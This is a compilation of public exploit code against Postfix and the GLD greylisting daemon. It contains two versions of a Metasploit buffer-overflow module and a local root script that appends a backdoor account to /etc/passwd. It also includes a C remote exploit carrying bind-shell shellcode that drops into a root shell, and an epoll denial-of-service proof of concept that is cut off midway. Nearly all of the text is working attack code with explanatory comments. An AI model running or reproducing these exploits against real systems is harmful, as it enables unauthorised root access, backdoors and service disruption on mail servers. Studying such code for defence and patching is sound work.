metasploit/GLD (Greylisting Daemon) Postfix Buffer Overflow ( linux)
##
# $Id: gld_postfix.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Metasploit module for CVE-2005-1099: a stack buffer overflow in the GLD
# greylisting daemon (<= 1.4) that Postfix queries as a policy service.
# A single target (RedHat 7.0) with a hard-coded return address.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata and its one option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
      'Description'    => %q{
This module exploits a stack buffer overflow in the Salim Gasmi
GLD <= 1.4 greylisting daemon for Postfix. By sending an
overly long string the stack can be overwritten.
},
      'Version'        => '$Revision: 9669 $',
      'Author'         => [ 'patrick' ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'linux',
      'References'     =>
        [
          [ 'CVE', '2005-1099' ],
          [ 'OSVDB', '15492' ],
          [ 'BID', '13129' ],
          [ 'URL', 'http://www.milw0rm.com/exploits/934' ],
        ],
      'Privileged'     => true,
      'License'        => MSF_LICENSE,
      'Payload'        =>
        {
          # Encoder constraints: NUL, LF, CR, space and '=' -- '=' is the
          # attribute separator used in the request built by #exploit.
          'Space'    => 1000,
          'BadChars' => "\x00\x0a\x0d\x20=",
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 12 2005'
    ))

    # RPORT is the only tunable; 2525 is the port this module expects GLD on.
    register_options(
      [
        Opt::RPORT(2525)
      ],
      self.class
    )
  end

  # Sends one request to the daemon. The `sender=` attribute carries the
  # encoded payload (bounded by 'Space'); `client_address=` carries
  # target['Ret'] packed as a 32-bit little-endian word ('V') repeated 300
  # times -- the overlong value that overruns the daemon's stack buffer.
  # The trailing blank line ends the request. No ensure/rescue: a failing
  # put leaves the connection to the framework's cleanup.
  #
  # @return [void]
  def exploit
    connect

    sploit = "sender="+ payload.encoded + "\r\n"
    sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"

    sock.put(sploit)

    handler
    disconnect
  end
end
RoMaNSoFt/Postfix <= 2.6-20080814 (symlink) Local Privilege Escalation Exploit ( linux)
#!/bin/sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#
# Config
# Operator-tunable settings; every path is probed in step 1 before anything
# is changed in step 2.
writable_dir=/tmp                                   # scratch dir for the link probe and the target backup
spool_dir=/var/mail                                 # Use "postconf mail_spool_directory" to obtain this
user=root                                           # mailbox name replaced by a hardlink in step 2
target=/etc/passwd                                  # file the link chain finally resolves to
useful_link=/usr/bin/atq                            # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at
useful_link_dst=at                                  # Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less
seconds=3                                           # wait after sendmail before comparing $target
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is "dsrrocks"
postfix=`which postfix`                             # /usr/sbin/postfix  (empty when not installed)
postconf=/usr/sbin/postconf
postmap=/usr/sbin/postmap
# Funcs
# Print a status line on stdout and stop the script.
#   $1 - message text
quit() { echo "$1"; exit; }
# Step 1: is my system vulnerable?
# Show this script's own header (lines 2-9: title, author, tested platforms).
head -n 9 $0 | tail -n 8

# $postfix is unquoted, so an empty `which` result makes the test false.
if [ $postfix ] ; then
	echo "[*] Postfix seems to be installed"
else
	quit "[!] Are you sure Postfix is installed?"
fi

# Probe: create a symlink (dst1 -> src), then hardlink it (dst2). If dst2 is
# itself still a symlink (-L), the hardlink was made to the symlink rather
# than to src -- the precondition the rest of the script relies on.
mkdir -p $writable_dir/pocfix
touch $writable_dir/pocfix/src
ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1
ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2
if [ -L $writable_dir/pocfix/dst2 ] ; then
	echo "[*] Hardlink to symlink not dereferenced"
	rm -rf $writable_dir/pocfix
else
	rm -rf $writable_dir/pocfix
	quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable"
fi

# Step 2 creates entries directly in the spool, so it must be writable.
if [ -d $spool_dir -a -w $spool_dir ] ; then
	echo "[*] Spool dir is writable"
else
	quit "[!] Spool dir is not writable"
fi

# Free both names the links will take. NOTE(review): an existing real
# mailbox for $user (root) is deleted here and never restored.
if [ -e $spool_dir/$user ] ; then
	rm -f $spool_dir/$user
	echo "[*] Mailbox for \"$user\" found. Trying to delete it"
	if [ -e $spool_dir/$user ] ; then
		quit "[!] Couldn't delete it"
	else
		echo "[*] Deletion ok"
	fi
fi
if [ -e $spool_dir/$useful_link_dst ] ; then
	rm -f $spool_dir/$useful_link_dst
	echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it"
	if [ -e $spool_dir/$useful_link_dst ] ; then
		quit "[!] Couldn't delete it"
	else
		echo "[*] Deletion ok"
	fi
fi

# Abort when an alias for $user exists in alias_database (checked only when
# that database is also listed in alias_maps); presumably delivery would then
# be redirected away from the spool mailbox.
aliases=`$postconf alias_database | cut -d"=" -f2`
$postconf alias_maps | grep -q $aliases
if [ $? -eq 0 ] ; then
	if [ $aliases ] ; then
		$postmap -q $user $aliases > /dev/null
		if [ $? -eq 0 ] ; then
			quit "[!] Mail alias for \"$user\" exists"
		fi
	fi
fi

# A non-empty mailbox_command means an external LDA does the delivery.
lda=`$postconf mailbox_command | cut -d"=" -f2`
if [ $lda ] ; then
	quit "[!] Non-Postfix LDA detected"
fi

# home_mailbox ending in "/" means Maildir delivery, not the spool file.
$postconf home_mailbox | grep -q '/$'
if [ $? -eq 0 ] ; then
	quit "[!] Maildir-style mailbox detected"
fi
# Step 2: Exploiting
# Hardlink the root-owned symlink $useful_link (atq -> at) under $user's
# mailbox name. The link keeps root ownership, and its relative target "at"
# now resolves inside $spool_dir. ln needs both paths on one filesystem.
ln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)"
# Complete the chain: $spool_dir/$user -> at -> $target.
ln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!] Couldn't create symlink pointing to target file"
# Copy of $target for the before/after comparison. NOTE(review): the backup is
# neither restored nor removed by this script.
cp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed up: $target (saved as \"$writable_dir/pocfix_target_backup.$$\")"
# Deliver one line to $user. Whether the delivery agent follows the chain is
# what CVE-2008-2936 is about; the script only observes the outcome via diff.
echo "[*] Sending mail ($seconds seconds wait)"
echo $user_in_passwd | /usr/sbin/sendmail $user
sleep $seconds
# Unchanged $target => the delivery did not reach it.
diff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null
if [ $? -eq 0 ] ; then
	echo "[!] Exploit failed"
else
	echo "[*] Exploit successful (appended data to $target). Now \"su dsr\", pass is \"dsrrocks\")"
fi
# Remove the two links; any line appended to $target is left in place.
rm -f $spool_dir/$user
rm -f $spool_dir/$useful_link_dst
# milw0rm.com [2008-08-31]
patrick/Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow ( linux)
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Metasploit module for CVE-2005-1099: a stack overflow in the GLD
# greylisting daemon (<= 1.4) that Postfix queries as a policy service.
# A single target (RedHat 7.0) with a hard-coded return address. This
# revision declares no Rank and no DisclosureDate.
class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata and its one option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
      'Description'    => %q{
This module exploits a stack overflow in the Salim Gasmi
GLD <= 1.4 greylisting daemon for Postfix. By sending an
overly long string the stack can be overwritten.
},
      'Version'        => '$Revision$',
      'Author'         => [ 'patrick' ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'linux',
      'References'     =>
        [
          [ 'CVE', '2005-1099' ],
          [ 'OSVDB', '15492' ],
          [ 'BID', '13129' ],
          [ 'URL', 'http://www.milw0rm.com/exploits/934' ],
        ],
      'Privileged'     => true,
      'License'        => MSF_LICENSE,
      'Payload'        =>
        {
          # Encoder constraints: NUL, LF, CR, space and '=' -- '=' is the
          # attribute separator used in the request built by #exploit.
          'Space'    => 1000,
          'BadChars' => "\x00\x0a\x0d\x20=",
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
        ],
      'DefaultTarget'  => 0
    ))

    # RPORT is the only tunable; 2525 is the port this module expects GLD on.
    register_options(
      [
        Opt::RPORT(2525)
      ],
      self.class
    )
  end

  # Sends one request to the daemon. The `sender=` attribute carries the
  # encoded payload (bounded by 'Space'); `client_address=` carries
  # target['Ret'] packed as a 32-bit little-endian word ('V') repeated 300
  # times -- the overlong value that overruns the daemon's stack buffer.
  # The trailing blank line ends the request.
  #
  # @return [void]
  def exploit
    connect

    sploit = "sender="+ payload.encoded + "\r\n"
    sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"

    sock.put(sploit)

    handler
    disconnect
  end
end
Xpl017Elz/gld 1.4 (Postfix Greylisting Daemon) Remote Format String Exploit ( linux)
/*
**
**
** 0x82-meOw-linuxer_forever - gld 1.4 remote overflow format string exploit.
** (c) 2005 Team INetCop Security.
**
** Nickname of this code is,
** `Kill two bird with one stone.' or, `One shot, two kill!.'
** hehehe ;-D
**
** Advisory URL:
** http://x82.inetcop.org/h0me/adv1sor1es/INCSA.2005-0x82-026-GLD.txt
**
** It's as well as RedHat Linux and to gentoo, debian Linux, *BSD.
** You can develop for your flatform.
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
**
**
** P.S: My domain x82.i21c.net encountered compulsion withdrawal from the country.
** They are killing many hackers of the Korea. hehehe ;-p
**
*/
/*
**
** These days, the main issue that strikes Korea is small rocky island "Dokdo".
** You can get more detailed information from following websites.
**
** "Japanese goverment has to follow and learn from German goverment"
**
** I can confidently say "Dokdo is belong to Korea".
**
** (1) reference
**
** 1) Their claim that the East Sea has some historical precedent worked,
** as some major book and map publishers, educational web sites and other
** reference materials now include the East Sea name along with the Sea of Japan.
** - worldatlas.com-
**
** http://www.worldatlas.com/webimage/countrys/asia/eastsea.htm
**
** 2) On historical perspective and in international law, why there
** is no valid dispute over the ownership of Dokdo.
**
** http://www.prkorea.com/english/textbook/ge03.html
**
** 3)Truth in scholarship
**
** http://www.prkorea.com/english/textbook/maintruth.html
**
**
*/
#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEF_HOST "localhost"
#define PORT 2525
/* One target profile. main() loads these into retloc/shell/sflag for the
 * selected -t index; -r/-s/-f override them individually. */
struct os_t {
	int number;               /* table index, the value given to -t */
	char *os_type;            /* label printed by usage()/main(); NULL terminates the table */
	unsigned long dtors_addr; /* -r: .dtors address used by make_fmt_code() (types 0,1); 0 for the overflow types */
	unsigned long shell;      /* -s: address passed to make_fmt_code()/make_bof_code(); for type 3 the jmp *%esp location */
	int sflag;                /* -f: "$-flag count" for the format-string types; passed as `size` (word count) to make_bof_code() */
};

struct os_t platform[]={
	{
		0,"Red Hat Linux release 7.0 (Guinness) gld 1.4 (format string exploit)",
		0x0804db98,0xbfffa3bc,15
	},
	{
		1,"Red Hat Linux release 9 (Shrike) gld 1.4 (format string exploit)",
		0x0804d14c,0x0805506e,15
	},
	{
		2,"Red Hat Linux release 7.0 (Guinness) gld 1.4 (buffer overflow exploit)",
		0,0xbfffa5d8,300
	},
	{
		/* jmp *%esp method */
		3,"Red Hat Linux release 9 (Shrike) gld 1.4 (buffer overflow exploit)",
		0,0x4212c5eb,254
	},
	{
		/* sentinel: usage() stops at os_type == NULL; main() rejects -t >= 4 */
		4,NULL,0,0,0
	}
};
int __debug_chk=0;   /* -d: main() sleeps 10 s before sending when set */
char t_atk[0xfff*3]; /* request buffer (12285 bytes) filled by make_*_code() and sent by main() */

// This is lovable shellcode, that's sweet in linux platform.
/* Per the author's note a bind shell on tcp/36864; main() connects to that
 * port after the request is sent. Contains no 0x00 byte, so it survives the
 * %s copies in make_*_code(). */
char shellcode[]= /* portshell shellcode, 128 bytes (tcp/36864) */
	"\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40\x89"
	"\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46\x10\x10\x66\x89"
	"\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18\xb0\x90\x66\x89"
	"\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0\x66\xcd\x80\x89"
	"\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66"
	"\x43\xcd\x80\x86\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80"
	"\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c"
	"\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";

/* prototypes; definitions follow main() */
void banrl();
int make_bof_code(unsigned long shell,int size,int type);
int make_fmt_code(unsigned long retloc,unsigned long shell,int sflag);
int setsock(char *host,int port);
void usage(char *args);
void re_connt(int sock);
void conn_shell(int sock);
/*
 * Entry point: parses options, builds the request for the selected target
 * type into the global t_atk, sends it to host:PORT, then connects to
 * host:36864 (where the shellcode is expected to listen, per its comment)
 * and hands that socket to conn_shell().
 *
 * Options (also listed by usage()): -d pause 10 s before sending; -r/-s/-f
 * override retloc/shell/sflag; -h host; -t target index (reloads all three
 * values from platform[]); -i help. `port` is always PORT; no option sets it.
 *
 * NOTE(review): `sock` first holds the getopt() result and is then reused
 * for the socket. `type` is rejected only when >= 4, so a negative -t value
 * indexes platform[] out of bounds. memset/strncpy/strtoul/atoi/exit/strlen
 * are called without <string.h>/<stdlib.h> being included.
 */
int main(int argc,char *argv[])
{
	int sock,type=0;
	int port=(PORT);
	char host[256]=DEF_HOST;
	/* defaults from platform[0] */
	int sflag=platform[type].sflag;
	unsigned long retloc=platform[type].dtors_addr;
	unsigned long shell=platform[type].shell;

	(void)banrl();
	while((sock=getopt(argc,argv,"DdF:f:R:r:S:s:H:h:T:t:Ii"))!=EOF) {
		extern char *optarg;
		switch(sock) {
		case 'D':
		case 'd':
			__debug_chk=1;
			break;
		case 'R':
		case 'r':
			retloc=strtoul(optarg,NULL,0);
			break;
		case 'S':
		case 's':
			shell=strtoul(optarg,NULL,0);
			break;
		case 'F':
		case 'f':
			sflag=atoi(optarg);
			break;
		case 'H':
		case 'h':
			memset((char *)host,0,sizeof(host));
			strncpy(host,optarg,sizeof(host)-1);
			break;
		case 'T':
		case 't':
			type=atoi(optarg);
			if(type>=4){
				(void)usage(argv[0]);
			} else {
				retloc=platform[type].dtors_addr;
				shell=platform[type].shell;
				sflag=platform[type].sflag;
			}
			break;
		case 'I':
		case 'i':
			(void)usage(argv[0]);
			break;
		case '?':
			fprintf(stderr,"Try `%s -i' for more information.\n\n",argv[0]);
			exit(-1);
			break;
		}
	}

	fprintf(stdout," #\n # target host: %s:%d\n",host,port);
	fprintf(stdout," # type: %s\n",platform[type].os_type);

	/* 0,1: format string; 2: plain overflow; 3: jmp *%esp variant */
	switch(type)
	{
	case 0:
	case 1:
		(int)make_fmt_code(retloc,shell,sflag);
		break;
	case 2:
		(int)make_bof_code(shell,sflag,0);
		break;
	case 3:
		(int)make_bof_code(shell,sflag,1);
	}

	fprintf(stdout," # send code size: %d byte\n",strlen(t_atk));
	sock=setsock(host,port);
	(void)re_connt(sock); /* exits when setsock() returned -1 */
	if(__debug_chk) sleep(10);
	send(sock,t_atk,strlen(t_atk),0);
	close(sock);

	fprintf(stdout," #\n # Waiting rootshell, Trying %s:36864 ...\n",host);
	sleep(1);
	sock=setsock(host,36864);
	(void)re_connt(sock);
	fprintf(stdout," # connected to %s:36864 !\n #\n\n",host);
	(void)conn_shell(sock);
}
/*
 * Fills the global t_atk with the overflow request for target types 2 and 3.
 *   shell - type 0: value repeated over the saved return address;
 *           type 1: address of the jmp *%esp instruction (platform[] comment)
 *   size  - number of 4-byte words placed in client_address (the platform
 *           entry's sflag, or -f)
 *   type  - 0: plain overflow, 1: jmp *%esp variant
 * Declared int but never returns a value; main() discards the result.
 *
 * NOTE(review): code_buf is 4096 bytes and `size` comes from the command
 * line unchecked; size*4 (plus the fixed words and the shellcode on the
 * type-1 path) must stay below that or the writes run past the local buffer.
 * Both %s copies stop at the first NUL, so a `shell` value containing 0x00
 * truncates client_address.
 */
int make_bof_code(unsigned long shell,int size,int type)
{
	int a,b;
	char nop_shell[8192];
	char code_buf[4096];

	memset((char *)nop_shell,0,sizeof(nop_shell));
	memset((char *)code_buf,0,sizeof(code_buf));
	memset((char *)t_atk,0,sizeof(t_atk));

	switch(type)
	{
	case 0:
		fprintf(stdout," # method: normal overflow exploit: %d byte\n",size);
		/* sender buffer = nop, shellcode */
		/* exactly 1000 bytes: 'N' filler followed by the shellcode */
		for(a=0;a<1000-strlen(shellcode);a++)
			nop_shell[a]='N';
		for(b=0;b<strlen(shellcode);b++)
			nop_shell[a++]=shellcode[b];
		/* client_address = retaddr */
		/* `size` copies of shell, stored as (unaligned) 4-byte words */
		for(b=0;b<size*4;b+=4)
			*(long *)&code_buf[b]=shell;
		snprintf(t_atk,sizeof(t_atk)-1,
			"sender=%s\r\n"
			"client_address=%s\r\n\r\n",nop_shell,code_buf);
		break;
	case 1:
		fprintf(stdout," # method: jmp *%%esp exploit: %d byte\n",size);
		/* sender buffer */
		/* 1000 'N' bytes only; on this path the shellcode goes in client_address */
		for(a=0;a<1000;a++)
			nop_shell[a]='N';
		/* client_address buffer */
		/* `size` filler words, then the fixed layout below */
		for(b=0;b<size*4;b+=4)
			*(long *)&code_buf[b]=0x82828282;
		/* ebp */
		*(long *)&code_buf[b]=0x41414141;
		b+=4;
		/* eip (jmp *%esp) */
		*(long *)&code_buf[b]=(shell);
		b+=4;
		/* jmp nop (0xeb,0x08) */
		*(long *)&code_buf[b]=0x08eb08eb;
		b+=4;
		/* dummy, nop */
		// 0x0804d280 0xbfffe1c8 0x08049521
		*(long *)&code_buf[b]=0x0804d280;
		b+=4;
		*(long *)&code_buf[b]=0x90909090;//0xbfffe1c8;
		b+=4;
		*(long *)&code_buf[b]=0x90909090;//0x08049521;
		b+=4;
		*(long *)&code_buf[b]=0x90909090;
		b+=4;
		/* shellcode */
		for(a=0;a<strlen(shellcode);a++)
			code_buf[b++]=shellcode[a];
		snprintf(t_atk,sizeof(t_atk)-1,
			"sender=%s\r\n"
			"client_address=%s\r\n\r\n",nop_shell,code_buf);
	}
}
/*
 * Fills the global t_atk with the format-string request for target types
 * 0 and 1.
 *   retloc - .dtors address; header holds retloc, retloc+1, +2, +3
 *   shell  - 32-bit value whose four bytes are written, one per %n
 *   sflag  - first positional argument index ("$-flag count"); the four
 *            %n conversions use sflag .. sflag+3
 * Declared int but never returns a value; main() discards the result.
 *
 * NOTE(review): %p is given an unsigned long and %d a size_t (strlen) --
 * mismatched format arguments. header is printed with %s, so a retloc
 * containing a 0x00 byte truncates it.
 */
int make_fmt_code(unsigned long retloc,unsigned long shell,int sflag)
{
	unsigned char header[256];
	unsigned char nop_shell[8192];
	int a,b,c,d,e,f;
	int addr1,addr2,addr3,addr4;

	a=b=c=d=e=f=addr1=addr2=addr3=addr4=0;
	memset((char *)header,0,sizeof(header));
	memset((char *)nop_shell,0,sizeof(nop_shell));
	memset((char *)t_atk,0,sizeof(t_atk));

	fprintf(stdout," # Make format string, .dtors: %p\n",retloc);
	/* four consecutive target addresses, one per byte of `shell` */
	*(long *)&header[0]=retloc+0;
	*(long *)&header[4]=retloc+1;
	*(long *)&header[8]=retloc+2;
	*(long *)&header[12]=retloc+3;

	/* a..d: bytes of shell from most to least significant;
	 * addr1..addr4: the same bytes, kept unadjusted for the deltas below */
	a=(shell>>24)&0xff;
	addr1=(shell>>24)&0xff;
	b=(shell>>16)&0xff;
	addr2=(shell>>16)&0xff;
	c=(shell>>8)&0xff;
	addr3=(shell>>8)&0xff;
	d=(shell>>0)&0xff;
	addr4=(shell>>0)&0xff;

	/* each field width below is the difference to the previous byte; when
	 * that difference would drop under 10, 0x100 is added to the minuend */
	if((addr4-16-65)<10)d+=0x100;
	if((addr3-addr4)<10)c+=0x100;
	if((addr2-addr3)<10)b+=0x100;

	/* 320-byte landing area: 'N' filler followed by the shellcode */
	for(e=0;e<320-strlen(shellcode);e++)
		nop_shell[e]='N';
	for(f=0;f<strlen(shellcode);f++)
		nop_shell[e++]=shellcode[f];

	fprintf(stdout," #\n # shellcode addr: %p, size: %d byte\n",shell,strlen(nop_shell));
	/* request = header, four "%<width>u%<pos>$n" pairs writing d, c, b, a in
	 * turn, then nop_shell. The 16 and 65 subtracted from the first width
	 * account for output already counted before the first %n (16 = header
	 * bytes; 65 presumably covers text the daemon prepends -- confirm). */
	snprintf(t_atk,sizeof(t_atk)-1,
		"client_address=%s" /* header */
		"%%%ux%%%d$n%%%ux%%%d$n%%%ux%%%d$n%%%ux%%%d$n" /* fmt code */
		"%s\r\n\r\n", /* shellcode */
		header,d-16-65,(sflag+0),c-addr4,(sflag+1),b-addr3,
		(sflag+2),0x100+a-addr2,(sflag+3),nop_shell);
}
/* Terminate the program when setsock() reported failure; otherwise do nothing.
 *   sock - descriptor returned by setsock(), -1 on failure */
void re_connt(int sock)
{
	if(sock!=-1)
		return;
	fprintf(stdout," #\n # Failed.\n");
	fprintf(stdout," # Happy Exploit ! :-)\n #\n\n");
	exit(-1);
}
/* Open a TCP connection to host:port.
 *   host - host name or dotted address, resolved with gethostbyname()
 *   port - TCP port in host byte order
 * Returns the connected descriptor, or -1 after reporting the failing step.
 * NOTE(review): the descriptor is not closed when connect() fails. */
int setsock(char *host,int port)
{
	struct hostent *ent=gethostbyname(host);
	struct sockaddr_in peer;
	int fd;

	if(ent==NULL)
	{
		herror(" # gethostbyname() error");
		return(-1);
	}
	fd=socket(AF_INET,SOCK_STREAM,0);
	if(fd==-1)
	{
		perror(" # socket() error");
		return(-1);
	}
	peer.sin_family=AF_INET;
	peer.sin_port=htons(port);
	peer.sin_addr=*((struct in_addr *)ent->h_addr);
	bzero(&(peer.sin_zero),8);
	if(connect(fd,(struct sockaddr *)&peer,sizeof(struct sockaddr))==-1)
	{
		perror(" # connect() error");
		return(-1);
	}
	return(fd);
}
/*
 * Relay between the local terminal and the connected socket. Sends `cmd`
 * once, then select()s on the socket and stdin: socket data is printed to
 * stdout, stdin data is written to the socket. Ends with exit(0) when the
 * socket read returns <= 0.
 *   sock - connected descriptor from setsock()
 *
 * NOTE(review): rbuf is 1024 bytes and both read() calls may fill it
 * completely, after which rbuf[pckt]=0 writes one byte past the end.
 * The trailing `return;` is unreachable.
 */
void conn_shell(int sock)
{
	int pckt;
	char *cmd="uname -a;id;export TERM=vt100;exec bash -i\n";
	char rbuf[1024];
	fd_set rset;

	memset((char *)rbuf,0,1024);
	fprintf(stdout," #\n # Kill two bird with one stone!\n");
	fprintf(stdout," # OK, It's Rootshell\n #\n\n");
	send(sock,cmd,strlen(cmd),0);

	while(1)
	{
		fflush(stdout);
		/* nfds is sock+1, i.e. sock is assumed to be larger than STDIN_FILENO */
		FD_ZERO(&rset);
		FD_SET(sock,&rset);
		FD_SET(STDIN_FILENO,&rset);
		select(sock+1,&rset,NULL,NULL,NULL);
		if(FD_ISSET(sock,&rset))
		{
			pckt=read(sock,rbuf,1024);
			if(pckt<=0)
			{
				fprintf(stdout," #\n # Happy Exploit !\n #\n\n");
				exit(0);
			}
			rbuf[pckt]=0;
			printf("%s",rbuf);
		}
		if(FD_ISSET(STDIN_FILENO,&rset))
		{
			pckt=read(STDIN_FILENO,rbuf,1024);
			if(pckt>0)
			{
				rbuf[pckt]=0;
				write(sock,rbuf,pckt);
			}
		}
	}
	return;
}
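/* Print the program banner on stdout. No arguments, no return value. */
void banrl()
{
	/* Single literal: as listed, the string was split across a raw line
	 * break, which is not a valid C string and does not compile. */
	fprintf(stdout,"\n #\n # 0x82-meOw_linuxer_forever - Greylisting daemon for Postfix remote exploit\n");
	fprintf(stdout," # szoahc(at)hotmail(dot)com\n #\n\n");
}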
/* Print the option summary and the platform[] target table, then exit(0).
 *   args - argv[0], echoed in the usage and example lines */
void usage(char *args)
{
	int idx=0;

	fprintf(stdout," Usage: %s -options arguments\n\n",args);
	fputs("\t-r [retloc] - .dtors address.\n",stdout);
	fputs("\t-s [shell] - shellcode address.\n",stdout);
	fputs("\t-f [flag num] - $-flag count.\n",stdout);
	fputs("\t-h [host] - target hostname.\n",stdout);
	fputs("\t-t [type num] - target number.\n",stdout);
	fputs("\t-i - help information.\n\n",stdout);
	fputs(" - Target Type Number List -\n\n",stdout);
	/* table ends at the NULL os_type sentinel */
	while(platform[idx].os_type!=NULL)
	{
		fprintf(stdout," {%d} : %s\n",idx,platform[idx].os_type);
		idx++;
	}
	fprintf(stdout,"\n Example: %s -t 0 -h localhost\n",args);
	fprintf(stdout," Example: %s -r 0x82828282 -s 0x82828282 -f 15\n\n",args);
	exit(0);
}
// milw0rm.com [2005-04-13]
Albert Sellares/Postfix < 2.4.9, 2.5.5, 2.6-20080902 (.forward) Local DoS Exploit ( multiple)
/*
* http://www.wekk.net/research/CVE-2008-4042/CVE-2008-4042-exploit.c
* http://www.wekk.net/research/CVE-2008-3889/CVE-2008-3889-exploit.c
*
* Exploit for Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6
* before 2.6-20080902, when used with the Linux 2.6 kernel.
*
* CVE-2008-3889 & CVE-2008-4042
*
* by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net
* and Marc Morata Fité <marc.morata.fite[at]gmail[dot]com>
* 2008-09-16
*
* This Proof of concept creates a pipe and adds it in the postfix's epoll
* file descriptor.
* When the pipe is added, an endless loop will launch lots of events to the
* local and master postfix processes.
* This will slow down the system a lot.
*
* An example of use:
* 1- Put the content "| ~/CVE-2008-3889-exploit >> /tmp/postfix.log &" (with
* the double quotes)
* in the file ~/.forward
*
* 2- Put the CVE-2008-4042-exploit in your home
* gcc CVE-2008-3889-exploit.c -o CVE-2008-3889-exploit
*
* 3- Send an email to the user
*
* You can see the output at /tmp/postfix.log
*/
#include <sys/epoll.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dirent.h>
#include <errno.h>
#define FDOPEN 200
/*
 * Register `fd` with the epoll instance `fde` for every event type,
 * edge-triggered, and report the result on stdout.
 *   fde - epoll descriptor (located in /proc/<pid>/fd by main())
 *   fd  - descriptor to add (the pipe's read end or a dup() of it)
 */
void add_fd(int fde, int fd) {
	printf("[*] Adding fd %d to eventpoll %d\n", fd, fde);
	static struct epoll_event ev;   /* declaration after a statement: C99 */
	ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP|EPOLLET;
	errno =0;
	// If this is a socket fd, the load is high
	/* data is a union; the u64 store overwrites the u32 one */
	ev.data.u32 = 6;
	ev.data.u64 = 6;
	if (epoll_ctl(fde, EPOLL_CTL_ADD, fd, &ev) == 0) {
		printf(" => Fd %d added!\n", fd);
	} else {
		printf(" => Error (%d) adding fd %d\n", errno, fd);
	}
}
/*
 * Entry point. Creates a pipe, scans /proc/<pid>/fd for a descriptor whose
 * link target contains "eventpoll" (one inherited from the parent -- per the
 * header comment, the Postfix local/master processes), registers the pipe's
 * read end plus FDOPEN dup()s of it there, then loops writing and reading a
 * single byte through the pipe. Returns 0 only when no such descriptor is
 * found (via exit(0)); the loop itself never ends.
 *
 * NOTE(review): pipe(), opendir() and readlink() results are unchecked
 * (a NULL DIR* makes readdir() crash); link_d is not NUL-terminated if
 * readlink() fills all 256 bytes; `argc`/`argv` are unused.
 */
int main(int argc, char *argv[]) {
	int fds[2];
	char dir[32], c;
	int i, found = 0;

	pipe(fds);
	sprintf(dir, "/proc/%d/fd", getpid());
	printf("[*] Opening directory %s\n", dir);
	DIR *fd_dir = opendir(dir);
	struct dirent *de = readdir(fd_dir);

	// We are looking for the eventpoll file descriptor
	while (de != NULL) {
		char link_d[256];
		char link_f[256];
		memset(link_d, 0, 256);
		sprintf(link_f, "%s/%s", dir, de->d_name);
		readlink(link_f, link_d, 256);
		if ( strstr(link_d, "eventpoll") ) {
			found = 1;
			printf(" => %s points to %s\n", de->d_name, link_d);
			/* the fd name itself is the epoll descriptor number */
			add_fd(atoi(de->d_name), fds[0]);
			// We can test with more than one triggered event at once
			for (i = 0; i<FDOPEN; i++)
				add_fd(atoi(de->d_name),dup(fds[0]));
		}
		de = readdir(fd_dir);
	}
